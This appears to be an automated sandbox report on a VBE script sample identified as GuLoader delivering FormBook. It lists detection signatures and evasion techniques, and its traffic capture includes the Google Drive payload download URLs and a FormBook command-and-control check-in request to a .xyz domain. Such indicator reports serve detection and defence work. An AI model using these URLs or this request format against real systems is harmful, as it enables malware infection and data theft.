Windows Analysis Report
EL-25-536_40005512_Le Cuivre_23102024.vbe

Overview

General Information

Sample name: EL-25-536_40005512_Le Cuivre_23102024.vbe
Analysis ID: 1540843
MD5: 575f235ff45c6a6697fba7172ff403a8
SHA1: d9ed6dc4fd26fbed5d50db60ac696d6eac1eed37
SHA256: 571c0365a3bd9d99f9df9c8e91473425db45064a304a4882f8b4e6d14ec6d81a
Tags: vbeuser-abuse_ch
Infos:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: EL-25-536_40005512_Le Cuivre_23102024.vbe ReversingLabs: Detection: 21%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.7% probability
Source: unknown HTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\LocalServer32 source: powershell.exe, 00000006.00000002.2123953554.00000000078E6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msiexec.pdb source: dllhost.exe, 0000000B.00000002.2965414846.0000000003282000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2966636300.0000000003E3C000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.000000000291C000.00000004.00000001.00040000.00000000.sdmp
Source: Binary string: msiexec.pdbGCTL source: dllhost.exe, 0000000B.00000002.2965414846.0000000003282000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2966636300.0000000003E3C000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.000000000291C000.00000004.00000001.00040000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nJPhzxOixucOn.exe, 0000000A.00000002.2965739593.000000000082E000.00000002.00000001.01000000.00000008.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2965710212.000000000082E000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 00000008.00000003.2689598369.00000000203A4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2800123462.0000000020550000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2800123462.00000000206EE000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687484109.00000000201F9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2802784503.0000000003473000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2805006128.0000000003621000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2123953554.0000000007860000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: msiexec.exe, msiexec.exe, 00000008.00000003.2689598369.00000000203A4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2800123462.0000000020550000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2800123462.00000000206EE000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687484109.00000000201F9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, dllhost.exe, 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2802784503.0000000003473000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2805006128.0000000003621000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dllhost.pdb source: msiexec.exe, 00000008.00000002.2785751974.0000000004CA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2785925702.0000000004CFA000.00000004.00000020.00020000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000A.00000002.2965896022.00000000008D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Core.pdbWP source: powershell.exe, 00000006.00000002.2131541455.00000000088F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32AC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll)g source: powershell.exe, 00000006.00000002.2123953554.00000000078E6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.2123953554.0000000007860000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dllhost.pdbGCTL source: msiexec.exe, 00000008.00000002.2785751974.0000000004CA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2785925702.0000000004CFA000.00000004.00000020.00020000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000A.00000002.2965896022.00000000008D8000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 4x nop then xor eax, eax 11_2_030E9E90

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50008 -> 104.21.70.11:80
Performs DNS queries to domains with low reputation
Source: DNS query: www.akkushaber.xyz
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49738 -> 142.250.185.142:443
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49740 -> 142.250.185.142:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1q6CY4oUtcou-aVhA3_vUUUrfOOBqCrd8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1q6CY4oUtcou-aVhA3_vUUUrfOOBqCrd8&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /0mzg/?eBn8=2O13gIliMn3YsUw5a3KzRkO18CQjk9KHJ2ezAhJRRaOqIrVzHHZDa9+gXbVcJvld3ors0lI+gPWWM5QB07s0EfgV3tv6nKYxZWLGcFl7cPul4bAwfY0iYcg=&lvf=o4BpH HTTP/1.1Host: www.akkushaber.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; openframe/30.0.0.6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1q6CY4oUtcou-aVhA3_vUUUrfOOBqCrd8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1q6CY4oUtcou-aVhA3_vUUUrfOOBqCrd8&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /0mzg/?eBn8=2O13gIliMn3YsUw5a3KzRkO18CQjk9KHJ2ezAhJRRaOqIrVzHHZDa9+gXbVcJvld3ors0lI+gPWWM5QB07s0EfgV3tv6nKYxZWLGcFl7cPul4bAwfY0iYcg=&lvf=o4BpH HTTP/1.1Host: www.akkushaber.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; openframe/30.0.0.6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: www.akkushaber.xyz
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 06:47:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RgNokXVGELP9%2BfLzpB99hN%2FKnyoWQIdOprmy2PD3sDhw3nfDUnXvCJSjXtircE68iYmgTl6qxO64%2FRILu1uT%2FCvUfalpRK9%2F%2B5pUDW71xy%2FPjdixl6dKAmYgaG74wJbHt3rl9Nw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7804c2aabf486a-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1122&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=594&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 64 33 39 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 20 61 6d 70 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 33 37 39 63 34 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 61 6b 61 72 79 61 65 73 63 6f 72 74 68 61 62 65 72 2e 70 72 6f 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 31 30 2f 63 72 6f 70 70 65 64 2d 61 73 6c 61 6e 61 61 2d 33 32 78 33 32 2e 6a 70 65 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 61 6b 61 72 79 61 65 73 63 6f 72 74 68 61 62 65 72 2e 70 72 6f 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 31 30 2f 63 72 6f 70 70 65 Data Ascii: 7d39<!DOCTYPE html><html lang="tr" amp><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width,minimum-scale=1,maximum-scale=1,initial-scale=1"> <meta name="theme-color" content="#0379c4"><link rel="icon" href="https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/cropped-aslanaa-32x32.jpeg" sizes="32x32"><link rel="icon" href="https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/croppe
Source: powershell.exe, 00000006.00000002.2123953554.0000000007880000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000001.00000002.1909269428.0000024B27C34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000001.00000002.1909269428.0000024B27C6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000001.00000002.1937354419.0000024B35F20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1909269428.0000024B260D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1909269428.0000024B25EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2096188756.0000000004DC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1909269428.0000024B260D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1909269428.0000024B25EB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.2096188756.0000000004DC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBfq
Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://api.whatsapp.com/send?phone=
Source: msiexec.exe, msiexec.exe, 00000008.00000003.2198426789.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254733813.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687921782.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://aydingercekmasaj.xyz
Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://bedavabahis.xyz
Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdn.ampproject.org/v0.js
Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdn.ampproject.org/v0/amp-analytics-0.1.js
Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdn.ampproject.org/v0/amp-sidebar-0.1.js
Source: powershell.exe, 00000001.00000002.1937354419.0000024B35F20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1937354419.0000024B35F20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1937354419.0000024B35F20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1909269428.0000024B27C30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000001.00000002.1909269428.0000024B274E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1909269428.0000024B260D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: msiexec.exe, msiexec.exe, 00000008.00000002.2785546396.0000000004C4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000008.00000003.2254733813.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/V8
Source: msiexec.exe, 00000008.00000002.2785546396.0000000004C4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/ertificates
Source: powershell.exe, 00000001.00000002.1909269428.0000024B260D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1q6CY4oUtcou-aVhA3_vUUUrfOOBqCrd8P
Source: powershell.exe, 00000006.00000002.2096188756.0000000004F19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1q6CY4oUtcou-aVhA3_vUUUrfOOBqCrd8XR#l
Source: msiexec.exe, msiexec.exe, 00000008.00000002.2785546396.0000000004C4A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2294240633.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254733813.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2688040815.0000000004CBC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2785462555.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2294155314.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2785880619.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2785546396.0000000004C8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4
Source: msiexec.exe, 00000008.00000002.2785546396.0000000004C4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA41
Source: msiexec.exe, 00000008.00000002.2785546396.0000000004C8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4Y
Source: powershell.exe, 00000001.00000002.1909269428.0000024B27C5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.googh
Source: msiexec.exe String found in binary or memory: https://drive.usercontent.google.c
Source: powershell.exe, 00000001.00000002.1909269428.0000024B27C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1909269428.0000024B2634A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: msiexec.exe, msiexec.exe, 00000008.00000003.2294240633.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254733813.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2688040815.0000000004CBC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2241029730.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2294155314.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2785880619.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe String found in binary or memory: https://drive.usercontent.google.com/downl
Source: powershell.exe, 00000001.00000002.1909269428.0000024B27C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1909269428.0000024B2634A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1q6CY4oUtcou-aVhA3_vUUUrfOOBqCrd8&export=download
Source: msiexec.exe, 00000008.00000003.2687921782.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4&export=download
Source: dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Lato%3A400%2C600%7CRoboto%3A300%2C400%2C500%2C700&#038;ver=6
Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://gazipasanakliyat.xyz
Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://genelhaberler.xyz
Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://girismarsbahis.xyz
Source: powershell.exe, 00000001.00000002.1909269428.0000024B260D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1909269428.0000024B26AE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://haberinyeri.xyz
Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://habersosyal.xyz
Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://izmirgercekmasaj.xyz
Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://kayserigercekmasaj.xyz
Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://kutahyagercekmasaj.xyz
Source: nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://linkpoker.xyz
